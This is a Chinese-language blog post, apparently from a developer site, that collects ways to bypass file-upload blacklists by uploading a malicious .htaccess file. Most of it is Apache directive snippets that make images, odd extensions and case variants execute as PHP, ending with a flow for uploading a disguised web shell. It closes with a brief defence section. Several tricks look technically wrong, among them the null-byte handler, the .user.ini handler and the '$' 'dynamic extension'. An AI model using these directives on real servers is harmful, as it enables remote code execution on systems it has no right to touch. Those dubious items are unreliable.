.htaccess 文件上传漏洞绕过总结

.htaccess 文件上传漏洞绕过总结

核心原理

通过 .htaccess 文件修改服务器配置,将非常规扩展名解析为可执行脚本(如 PHP),绕过文件上传黑名单限制。


一、关键配置指令(图片内容分析)

图片中列出的扩展名MIME 类型可直接用于绕过:

apache 复制代码
# 将扩展名映射到 PHP 解析器
AddHandler application/x-httpd-php .rhtml .phtml .pht .phps .php3 .php3p .php4 .php5

# 或使用 AddType
AddType application/x-httpd-php .phtml .php3 .phps

二、扩展绕过技巧(实战增强)

1. 非常规扩展名
apache 复制代码
AddHandler application/x-httpd-php .abc .xyz .shell .test

效果 :上传 shell.abc 会被当作 PHP 执行。

2. 双扩展名绕过
apache 复制代码
AddHandler application/x-httpd-php .jpg.xyz

效果image.jpg.xyz 会被解析为 PHP。

3. 空字节截断(旧系统)
apache 复制代码
AddHandler application/x-httpd-php .php%00

效果 :上传 shell.php%00.jpg 可能被解析为 PHP(需 PHP<5.3)。

4. 大小写混淆
apache 复制代码
AddHandler application/x-httpd-php .PhP5 .pHtML

效果 :绕过对 php 的大小写检查。

5. 特殊前缀/后缀
apache 复制代码
AddHandler application/x-httpd-php .user.ini

效果 :利用 .user.iniauto_prepend_file 执行代码。


三、MIME 类型绕过

apache 复制代码
# 伪造图片 MIME 类型
AddType application/x-httpd-php .jpg .png

# 或直接覆盖默认类型
RemoveHandler .jpg
AddHandler application/x-httpd-php .jpg

四、高级组合技

1. 嵌套解析绕过
apache 复制代码
<FilesMatch "\.hack$">
  SetHandler application/x-httpd-php
</FilesMatch>

效果 :所有 .hack 文件被解析为 PHP。

2. 动态扩展名
apache 复制代码
AddHandler application/x-httpd-php ."$"

效果:利用环境变量动态生成扩展名(需服务器支持)。


五、防御建议(管理员视角)

  1. 禁用 .htaccess 覆盖

    apache 复制代码
    AllowOverride None
  2. 限制上传目录执行权限

    apache 复制代码
    <Directory "/uploads">
       php_flag engine off
    </Directory>
  3. 严格文件类型检查

    • 使用白名单验证扩展名 + MIME 类型 + 文件头签名。

总结流程图

复制代码
上传 .htaccess 文件
  │
  ├── 添加恶意扩展名(.phtml, .php5)
  │
  ├── 伪造 MIME 类型(image/jpg → PHP)
  │
  └── 上传伪装文件(shell.jpg.php5)
       │
       └── 服务器解析执行

通过灵活组合扩展名、MIME 类型和服务器配置规则,可绕过大多数基于黑名单的文件上传防护。

相关推荐
Kookoos1 小时前
ABP VNext + Apache Kafka Exactly-Once 语义:金融级消息一致性实战
金融·kafka·apache·abp vnext·outbox pattern
hongjunwu2 小时前
Java集合的遍历方式(全解析)
java·开发语言·windows
ALLSectorSorft2 小时前
定制客车系统票务管理系统功能设计
linux·服务器·前端·数据库·apache
清 晨2 小时前
Web3.0引领互联网未来,助力安全防护升级
安全·web3·互联网·facebook·tiktok·instagram·clonbrowser
Jooolin2 小时前
【Linux】Linux 的权限:你必须掌握的文件安全基础
linux·安全·ai编程
lifallen4 小时前
Kafka ISR机制和Raft区别:副本数优化的秘密
java·大数据·数据库·分布式·算法·kafka·apache
云罗ymh63814 小时前
碰一碰NFC开发写好评php语言源码
开发语言·php
cver1234 小时前
建筑物实例分割数据集-9,700 张图片 城市规划与发展 灾害评估与应急响应 房地产市场分析 智慧城市管理 地理信息系统(GIS) 环境影响评估
人工智能·安全·目标检测·机器学习·计算机视觉·目标跟踪·智慧城市